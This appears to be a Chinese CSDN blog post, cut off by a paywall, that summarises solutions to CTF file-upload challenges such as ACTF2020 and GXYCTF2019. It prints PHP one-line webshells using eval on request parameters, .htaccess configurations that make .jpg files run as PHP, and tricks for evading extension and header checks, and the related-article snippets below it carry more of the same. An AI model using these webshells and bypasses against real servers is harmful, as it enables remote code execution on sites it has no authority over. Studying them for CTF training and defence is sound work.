CTF下的文件上传

最新推荐文章于 2024-04-22 17:07:01 发布
最新推荐文章于 2024-04-22 17:07:01 发布
阅读量9.3k 收藏 30
点赞数 13
分类专栏: 文件上传 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/105607459
版权

前言:

CTF下的文件上传考法也有很多种,结合做过的题目进行一个总结。

[ACTF2020 新生赛]Upload

——后缀名绕过
在这里插入图片描述
有JS代码在前端验证,先上传要求的格式再通过抓包修改后缀名
在这里插入图片描述
看来php后缀被过滤了,可以尝试其他后缀名
在这里插入图片描述
php常用后缀名如下:

# php2,php3、php4、php5、phtml、phtm
代替php后缀

在这里插入图片描述
phtml和phtm后缀即可上传进行,下面就是连接查看flag了

类似题目:

[极客大挑战 2019]Upload

[GXYCTF2019]BabyUpload

——图片马
在这里插入图片描述
经过测试只有jpg后缀的图片可以上传进行,利用php后缀名无法绕过,大小写也无法绕过,那就通过上传.htaccess文件来解析上传的jpg图片
在这里插入图片描述
上传成功,下面传入jpeg马连接即可
在这里插入图片描述
补充一下上传姿势和.htaccess 文件上传

#上传姿势
添加gif89a的头
<script language=”php”>
php2,php3、php4、php5、phtml、phtm代替php后缀
传.htaccess
截断上传

#.htaccess文件上传
#方法一:
# FileMatch 参数即为文件名的正则匹配
<FilesMatch "1.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>
// 1.jpg
<?php eval($_GET['a']);?>
#方法二:
AddType application/x-httpd-php .jpg
// 1.jpg
<?php eval($_GET['a']);?>

类似题目:

[MRCTF2020]你传你🐎呢

[RoarCTF 2019]Simple Upload

——条件竞争、Thinkphp的文件上传、脚本上传

在这里插入图片描述
很明显就是Thinkphp的代码,查到thinkphp的手册
ThinkPHP3.2完全开发手册
查资料发现Thinkphp默认上传路径是/home/index/upload
这道题没有上传点,应该是要自己编写脚本上传进去,可以参考师傅的文章去写

最低0.47元/天 解锁文章
lemonl1
关注
  • 13
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2024年最全CTFshow web入门——文件上传_ctfshow文件上传,给大家安排上
2401_84520377的博客
05-05 864
上传一个图片木马,发现上传不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过。经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag。那就直接输出flag算了,不搞一句话了。要修改的图片的路径,1.png是使用的文件,可以不存在。查看flag.php文件内容得出flag。下面的代码可以检测是否有gd库的存在。将生成的图片上传,bp抓包。
文件上传漏洞详解(CTF篇)
热门推荐
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马
攻防世界CTF题:upload1
Aixwei的博客
04-11 980
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
buuctf-[ACTF2020 新生赛]Upload(小宇特详解)
小宇的web博客
01-15 2747
buuctf-[ACTF2020 新生赛]Upload(小宇特详解) 这里把鼠标放到小灯泡上,发现小灯泡亮了且有文件上传的地方。 这里先上传一个php文件来查看能否上传 这里只能上传指定类型的。查看源代码。 这里进行了前端验证。 这里尝试一下抓包,修改后缀进行上传。 这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt
ctf文件上传
Zheng_Jay的博客
11-15 3871
客户端校验 最简单的文件校验是本地js校验,一般都是要求只能上传jpg,png,gif图片格式: 应对措施:在本地禁用js。 服务端校验 服务端校验比较棘手一点。 MIME类型校验 虽然我们在客户端同过禁用js上传了文件,但服务端还会再对文件类型进行校验,并且校验的是MIME。 我们在开发者工具中,虽然看到文件发送成功: 但如果服务端对我们请求的数据中的MIME类型进行校验,发现并非image类型,仍会丢弃。 所以,我们要修改请求包中的MIME类型(使用burp suit),常见的MIME类型:
文件上传+CTF题目
unexpectedthing的博客
10-27 2374
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页前端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期 脚本及工具
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
CTF6靶机实战.zip
05-25
2. 文件上传漏洞:学习如何发现和利用文件上传漏洞,以及如何构造反弹shell。 3. Linux脚本和系统漏洞利用:深入理解系统漏洞,编写和执行利用脚本。 4. Metasploit Framework:掌握基本的Metasploit操作,如模块...
CTF-WEB篇 攻防世界题目实战解析upload1
最新发布
2301_76565920的博客
04-22 874
题目:upload 知识点:一句话木马,webshell,burpsuite拦截并修改数据包
CTF--WEB--文件上传
yanfangjie的博客
01-06 3726
前端验证 上传一个一句话木马,扩展名改成允许上传的扩展名。 在把.jpg改成.php 上传的路径在这里 我们可以使用蚁剑来连接 连接成功,得到flag。
[ACTF2020 新生赛]Upload
wuuconix's blog
03-11 1078
[ACTF2020 新生赛]Upload 考点 前端后缀名绕过的方式 php可执行文件后缀名的种类 主界面 有一个灯泡,提示你上传文件,前端有验证,只能上传 jpg|png|gif 这个时候我们有两种方式绕过前端验证 直接在源码里把验证函数删掉 先把文件改成jpg格式的,然后点击upload,用burp拦截,再重新改为原本格式 我们选择第一种方式,试着上传一下php文件,内容可以先用phpinfo() 测试一下能不能成功 页面提示nonono bad file!,看来
CTFHub文件上传 .htaccess题解
qq_52676257的博客
03-11 406
CTFHub文件上传 .htaccess题解 查看页面源代码发现不可上传文件类型有很多去,于是上传类型为1.htaccess的文件,内容为AddType application/x-httpd-php .jpg 上传成功后使用Burp Suite进行抓包,再改后缀名进行放包,最后连接中国蚁剑 ...
CTFhup文件上传漏洞练习
weixin_51583379的博客
09-15 1037
我们先上传一个正常的图片发现可以上传,我们再试试上传一个shell,发现上传不了。上传22.jpg 跟第四关的22.jpg一样,再bp抓包,修改后缀为php。我们再在中国蚁🗡上面写上shell地址和shell里面的值。发现上传成功我们用中国蚁🗡连接一下上传的shell地址。上传一个shell.php用bp抓包,修改这个。我们再上传一个shell,发现可以成功上传。我们再上传一个shell试试,发现上传不了。再发包,发现上传成功了,中国蚁🗡连接成功了。我们上传一个正常图片试试,发现上传成功。
BUUCTF做题Upload-Labs记录pass-01~pass-10
Goodric的博客
07-26 926
前端验证后缀。 传1.png 抓包改1.php 即可。
CTF考核writeup(1)
一段旅途
11-23 4197
在sql注入、文件上传和文件包含问题上,可以学到一些新思路。
CTFHUB文件上传
09-06
CTFHUB中,文件上传可以用来绕过安全限制并获取敏感信息。有几种常见的方法可以进行文件上传,包括.htaccess上传、.php木马文件上传和文件名后缀双写绕过。 在.htaccess上传方法中,首先上传.htaccess文件,然后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值